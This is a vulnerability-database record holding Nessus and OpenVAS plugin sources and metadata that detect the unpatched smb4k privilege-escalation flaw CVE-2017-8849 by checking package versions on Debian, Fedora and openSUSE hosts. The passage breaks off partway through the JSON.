ID DEBIAN_DSA-3951.NASL Type nessus Reporter This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2017-08-23T00:00:00
Description
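Sebastian Krahmer discovered that a programming error in the mount
helper binary of the Smb4k Samba network share browser may result in
local privilege escalation. The issue is tracked as CVE-2017-8849: the
mount helper D-Bus service fails to verify its arguments, which lets a
local user gain root privileges.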
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Debian Security Advisory DSA-3951. The text
# itself is copyright (C) Software in the Public Interest, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
# Metadata-registration branch. When `description` is true the script only
# declares its identity, references, scoring and prerequisites, then leaves
# through the exit(0) at the end of this branch; the package check further
# down is not reached on that path.
if (description)
{
# Plugin identity and revision bookkeeping.
script_id(102684);
script_version("3.5");
script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/04");
# Cross-references: the CVE and the Debian Security Advisory number that
# the text and package check were extracted from.
script_cve_id("CVE-2017-8849");
script_xref(name:"DSA", value:"3951");
script_name(english:"Debian DSA-3951-1 : smb4k - security update");
# Per the summary string, detection is based on dpkg output, i.e. on the
# installed package version rather than on probing the mount helper.
script_summary(english:"Checks dpkg output for the updated package");
script_set_attribute(
attribute:"synopsis",
value:"The remote Debian host is missing a security-related update."
);
script_set_attribute(
attribute:"description",
value:
"Sebastian Krahmer discovered that a programming error in the mount
helper binary of the Smb4k Samba network share browser may result in
local privilege escalation."
);
script_set_attribute(
attribute:"see_also",
value:"https://packages.debian.org/source/jessie/smb4k"
);
script_set_attribute(
attribute:"see_also",
value:"https://www.debian.org/security/2017/dsa-3951"
);
# Remediation text: names the fixed version for jessie only.
script_set_attribute(
attribute:"solution",
value:
"Upgrade the smb4k packages.
For the oldstable distribution (jessie), this problem has been fixed
in version 1.2.1-2~deb8u1."
);
# Scoring. CVSS v2 base: local access, low complexity, no authentication,
# complete confidentiality/integrity/availability impact. The CVSS v3 base
# vector additionally records PR:L (low privileges required). Both temporal
# vectors record proof-of-concept exploit maturity and an official fix.
script_set_cvss_base_vector("CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_cvss3_base_vector("CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H");
script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
# Exploit availability is asserted as metadata here; nothing in this script
# verifies it. Useful for triage: patch priority should reflect it.
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
# Declared as a local check; the CPE entries scope it to the smb4k package
# on Debian 8.0.
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:smb4k");
script_set_attribute(attribute:"cpe", value:"cpe:/o:debian:debian_linux:8.0");
script_set_attribute(attribute:"patch_publication_date", value:"2017/08/22");
script_set_attribute(attribute:"plugin_publication_date", value:"2017/08/23");
script_end_attributes();
# Category, ownership and family used to classify the plugin.
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_family(english:"Debian Local Security Checks");
# Prerequisites: depends on ssh_get_info.nasl and requires three KB keys.
# NOTE(review): presumably ssh_get_info.nasl is what populates those keys
# from an authenticated session -- confirm. Without them the check cannot
# produce a finding, so the absence of a result does not show the host
# is patched.
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/Debian/release", "Host/Debian/dpkg-l");
# End of registration; do not fall through to the host check.
exit(0);
}
include("audit.inc");
include("debian_package.inc");
# Preconditions: each KB item below must be present, otherwise the run is
# handed to audit() with the matching audit code. audit() comes from
# audit.inc (not shown here) and is expected to end the script.
if (!get_kb_item("Host/local_checks_enabled"))
  audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/Debian/release"))
  audit(AUDIT_OS_NOT, "Debian");
if (!get_kb_item("Host/Debian/dpkg-l"))
  audit(AUDIT_PACKAGE_LIST_MISSING);

# Package check for DSA-3951: ask deb_check() about packages with prefix
# "smb4k" on release 8.0 against the fixed version 1.2.1-2~deb8u1. A true
# result is treated as "update missing".
# NOTE(review): deb_check() lives in debian_package.inc; presumably it
# compares the installed version from the collected dpkg list with the
# reference -- confirm. Either way this is a version comparison only: it
# does not exercise the smb4k mount helper, and only release 8.0 is
# queried, so other Debian releases are not assessed by this plugin.
missing_fix = deb_check(release:"8.0", prefix:"smb4k", reference:"1.2.1-2~deb8u1");

if (!missing_fix)
{
  # No vulnerable package reported: record the host as not affected.
  audit(AUDIT_HOST_NOT, "affected");
}
else
{
  # Report the finding on port 0; include the package report text only
  # when report verbosity is above zero.
  if (report_verbosity > 0)
    security_hole(port:0, extra:deb_report_get());
  else
    security_hole(0);
  exit(0);
}
{"id": "DEBIAN_DSA-3951.NASL", "bulletinFamily": "scanner", "title": "Debian DSA-3951-1 : smb4k - security update", "description": "Sebastian Krahmer discovered that a programming error in the mount\nhelper binary of the Smb4k Samba network share browser may result in\nlocal privilege escalation.", "published": "2017-08-23T00:00:00", "modified": "2017-08-23T00:00:00", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/102684", "reporter": "This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://packages.debian.org/source/jessie/smb4k", "https://www.debian.org/security/2017/dsa-3951"], "cvelist": ["CVE-2017-8849"], "type": "nessus", "lastseen": "2021-01-06T09:50:38", "edition": 25, "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-8849"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310851555", "OPENVAS:1361412562310703951", "OPENVAS:1361412562310872694", "OPENVAS:1361412562310891002", "OPENVAS:1361412562310872697"]}, {"type": "fedora", "idList": ["FEDORA:EA4816048681", "FEDORA:8DC72601E838", "FEDORA:E6C176051745"]}, {"type": "nessus", "idList": ["FEDORA_2017-ACEB424894.NASL", "GENTOO_GLSA-201705-14.NASL", "FEDORA_2017-F7849E04F4.NASL", "OPENSUSE-2017-595.NASL", "FEDORA_2017-2CC18E2B3B.NASL", "DEBIAN_DLA-1002.NASL"]}, {"type": "debian", "idList": ["DEBIAN:DSA-3951-1:6632E", "DEBIAN:DLA-1002-1:1EBFE"]}, {"type": "gentoo", "idList": ["GLSA-201705-14"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2017:1343-1"]}, {"type": "archlinux", "idList": ["ASA-201705-11"]}, {"type": "zdt", "idList": ["1337DAY-ID-27821"]}, {"type": "exploitdb", "idList": ["EDB-ID:42053"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142638"]}], "modified": "2021-01-06T09:50:38", "rev": 2}, "score": {"value": 6.7, "vector": "NONE", "modified": "2021-01-06T09:50:38", "rev": 2}, "vulnersScore": 6.7}, "sourceData": 
"#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3951. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(102684);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2017-8849\");\n script_xref(name:\"DSA\", value:\"3951\");\n\n script_name(english:\"Debian DSA-3951-1 : smb4k - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Sebastian Krahmer discovered that a programming error in the mount\nhelper binary of the Smb4k Samba network share browser may result in\nlocal privilege escalation.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/smb4k\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2017/dsa-3951\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the smb4k packages.\n\nFor the oldstable distribution (jessie), this problem has been fixed\nin version 1.2.1-2~deb8u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n 
script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:smb4k\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/08/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"smb4k\", reference:\"1.2.1-2~deb8u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "naslFamily": "Debian Local Security Checks", "pluginID": "102684", "cpe": ["cpe:/o:debian:debian_linux:8.0", "p-cpe:/a:debian:debian_linux:smb4k"], "scheme": null, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}}
{"cve": [{"lastseen": "2021-02-02T06:36:51", "description": "smb4k before 2.0.1 allows local users to gain root privileges by leveraging failure to verify arguments to the mount helper DBUS service.", "edition": 6, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-17T14:29:00", "title": "CVE-2017-8849", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8849"], "modified": "2019-03-18T16:41:00", "cpe": ["cpe:/a:smb4k_project:smb4k:2.0.0", "cpe:/o:debian:debian_linux:8.0"], "id": "CVE-2017-8849", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8849", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:smb4k_project:smb4k:2.0.0:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2020-01-31T18:27:25", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8849"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2017-05-19T00:00:00", "id": "OPENVAS:1361412562310851555", "href": 
"http://plugins.openvas.org/nasl.php?oid=1361412562310851555", "type": "openvas", "title": "openSUSE: Security Advisory for smb4k (openSUSE-SU-2017:1343-1)", "sourceData": "# Copyright (C) 2017 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851555\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-05-19 07:10:46 +0200 (Fri, 19 May 2017)\");\n script_cve_id(\"CVE-2017-8849\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for smb4k (openSUSE-SU-2017:1343-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'smb4k'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n 
script_tag(name:\"insight\", value:\"This update for smb4k fixes the following issues:\n\n - Disabled dbus service and polkit rules, because this version of smb4k\n has a local root exploit issue (boo#1036245, CVE-2017-8849). Automatic\n mounting will no longer be possible to work around this security issue.\");\n\n script_tag(name:\"affected\", value:\"smb4k on openSUSE Leap 42.2\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2017:1343-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.2\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.2\") {\n if(!isnull(res = isrpmvuln(pkg:\"smb4k\", rpm:\"smb4k~1.2.1~3.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"smb4k-debuginfo\", rpm:\"smb4k-debuginfo~1.2.1~3.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"smb4k-debugsource\", rpm:\"smb4k-debugsource~1.2.1~3.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"smb4k-doc\", rpm:\"smb4k-doc~1.2.1~3.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"smb4k-lang\", rpm:\"smb4k-lang~1.2.1~3.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, 
{"lastseen": "2019-05-29T18:34:30", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8849"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2017-05-23T00:00:00", "id": "OPENVAS:1361412562310872697", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872697", "type": "openvas", "title": "Fedora Update for smb4k FEDORA-2017-aceb424894", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for smb4k FEDORA-2017-aceb424894\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872697\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-05-23 07:14:27 +0200 (Tue, 23 May 2017)\");\n script_cve_id(\"CVE-2017-8849\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for smb4k FEDORA-2017-aceb424894\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'smb4k'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"smb4k on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-aceb424894\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/A5TLW2CHDKPEDQHHE62O5OJP5FU3VUO5\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"smb4k\", rpm:\"smb4k~1.2.2~3.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-29T20:07:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8849"], "description": "Sebastian Krahmer from SUSE discovered that smb4k, a Samba (SMB) share\nadvanced browser, contains a logic flaw in which the mount helper binary\ndoes not properly verify the mount command it is being asked to run.\n\nThis allows local users to call any other binary as root.\n\nThe issue is resolved by backporting version 1.2.1-2 from Debian 9\n", "modified": "2020-01-29T00:00:00", "published": "2018-01-29T00:00:00", "id": "OPENVAS:1361412562310891002", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891002", "type": "openvas", "title": "Debian LTS: Security Advisory for smb4k (DLA-1002-1)", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891002\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2017-8849\");\n script_name(\"Debian LTS: Security Advisory for smb4k (DLA-1002-1)\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-01-29 00:00:00 +0100 (Mon, 29 Jan 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2017/06/msg00031.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n\n script_tag(name:\"affected\", value:\"smb4k on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For Debian 7 'Wheezy', these problems have been fixed in version\n1.2.1-2~deb7u1.\n\nWe recommend that you upgrade your smb4k packages.\");\n\n script_tag(name:\"summary\", value:\"Sebastian Krahmer from SUSE discovered that smb4k, a Samba (SMB) share\nadvanced browser, contains a logic flaw in which the mount helper binary\ndoes not properly verify the mount command it is being asked to run.\n\nThis allows local users to call any other binary as root.\n\nThe issue is resolved by backporting version 1.2.1-2 
from Debian 9\n'Stretch'.\");\n\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"smb4k\", ver:\"1.2.1-2~deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:28", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8849"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2017-05-21T00:00:00", "id": "OPENVAS:1361412562310872694", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872694", "type": "openvas", "title": "Fedora Update for smb4k FEDORA-2017-2cc18e2b3b", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for smb4k FEDORA-2017-2cc18e2b3b\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872694\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-05-21 07:16:39 +0200 (Sun, 21 May 2017)\");\n script_cve_id(\"CVE-2017-8849\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for smb4k FEDORA-2017-2cc18e2b3b\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'smb4k'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"smb4k on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-2cc18e2b3b\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KRE6NA5IJ7WI4PPZTYCLCQQSXGHSSU2B\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"smb4k\", rpm:\"smb4k~1.2.2~3.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:30", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8849"], "description": "Sebastian Krahmer discovered that a programming error in the mount\nhelper binary of the Smb4k Samba network share browser may result in\nlocal privilege escalation.", "modified": "2019-03-18T00:00:00", "published": "2017-08-22T00:00:00", "id": "OPENVAS:1361412562310703951", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703951", "type": "openvas", "title": "Debian Security Advisory DSA 3951-1 (smb4k - security update)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: deb_3951.nasl 14280 2019-03-18 14:50:45Z cfischer $\n#\n# Auto-generated from advisory DSA 3951-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703951\");\n script_version(\"$Revision: 14280 $\");\n script_cve_id(\"CVE-2017-8849\");\n script_name(\"Debian Security Advisory DSA 3951-1 (smb4k - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:50:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-08-22 00:00:00 +0200 (Tue, 22 Aug 2017)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2017/dsa-3951.html\");\n\n 